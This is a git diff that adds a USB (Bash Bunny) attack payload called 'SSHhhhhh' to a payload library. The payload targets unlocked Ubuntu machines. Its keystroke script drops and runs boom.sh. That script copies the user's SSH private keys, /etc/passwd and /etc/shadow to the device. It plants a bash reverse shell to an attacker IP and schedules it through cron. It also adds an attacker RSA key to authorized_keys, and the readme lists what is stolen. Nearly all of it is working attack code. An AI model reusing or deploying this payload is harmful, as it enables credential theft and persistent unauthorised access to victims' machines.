diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh
new file mode 100644
index 00000000..11ecc635
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh	
@@ -0,0 +1,47 @@
+#!/bin/bash
+
+# Main Payload
+
+# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
+REVERSESHELL=true
+LHOST='10.20.20.104'  # Reverse Shell listening host IP
+LPORT='4444'   # Reverse Shell listening host port
+CRON='30 */1 * * *'  # Just the timing portion of the CRON job
+RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2'
+ATTACKER_HOST='engineering@kali-2'  # Tail end of RSA key from above.  Do not include spaces
+DT=$(date "+%Y.%m.%d-%H.%M.%S")
+DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
+
+if [ "$REVERSESHELL" = true ] ; then
+    # Create reverse shell script
+    echo "#!/bin/bash"> .config/rs.sh ;
+    echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
+    chmod +x /home/$USER/.config/rs.sh ;
+
+    # Add task to CRON that launches the Reverse_TCP script on a schedule  for persistence
+    crontab -l > crontab.tmp ;
+    if grep -Fq .config/rs.sh crontab.tmp; then
+        echo 'Update in progress.'
+    else
+        echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
+        crontab crontab.tmp ;
+    fi
+    rm -f crontab.tmp ;
+fi
+
+# Smash & Grab the loot!!  (Get what you can now and work on PrivEsc later)
+mkdir $DN ;
+ip addr > $DN/ip-addr.txt ;
+whoami > $DN/whoami.txt ;
+cat /etc/passwd > $DN/etc-passwd.txt ;
+cat /etc/shadow > $DN/etc-shadow.txt ;
+uname -a > $DN/uname-a.txt ;
+route -n > $DN/route-n.txt ;
+cp  /home/$USER/.ssh/* $DN/. ;
+
+# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
+if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
+    echo 'Update almost completed.'
+else
+    echo $RSA_KEY >> .ssh/authorized_keys ;
+fi
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt
new file mode 100644
index 00000000..e7548d8e
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt	
@@ -0,0 +1,52 @@
+# Title:         SSHhhhhh
+# Description:   Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
+# Author:        WWVB
+# Props:         Hak5Darren
+# Version:       1.0
+# Category:      Exfiltration w/Persistence
+# Target:        Linux Ubuntu 18.04 LTS
+# Attackmodes:   HID, Storage
+
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED  STAGE1
+QUACK DELAY 500
+QUACK CTRL-ALT t
+QUACK DELAY 100
+
+# Drop primary payload on the box
+QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh .
+QUACK ENTER
+QUACK DELAY 50
+
+QUACK STRING chmod +x boom.sh
+QUACK ENTER
+QUACK DELAY 50
+
+LED ATTACK
+
+# Light the fuse and wait!!
+QUACK STRING ./boom.sh
+QUACK ENTER
+QUACK DELAY 1000
+
+# Cleanup
+LED CLEANUP
+QUACK STRING rm boom.sh
+QUACK ENTER
+QUACK DELAY 100
+
+# Bye Felicia!
+QUACK STRING umount '/media/$USER/BashBunny'
+QUACK ENTER
+QUACK DELAY 25
+
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 25
+
+LED FINISH
diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md
new file mode 100644
index 00000000..1eb09821
--- /dev/null
+++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md	
@@ -0,0 +1,24 @@
+# SSHhhhhh
+
+# Author: WWVB
+# Version: Version 1.0
+
+# Description
+
+# Target =  Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
+                    Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major])
+
+# Loot =      Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
+                    whoami
+                    ip addr
+                    route -n
+                    /etc/passwd
+                    /etc/shadow (on the off chance you get a root terminal)
+                    uname -a
+
+    Two opportunites for persistence are injected:
+            Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
+            Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job
+                added that calls it on a schedule (aka Call Me Later)
+
+# Configuration = HID STORAGE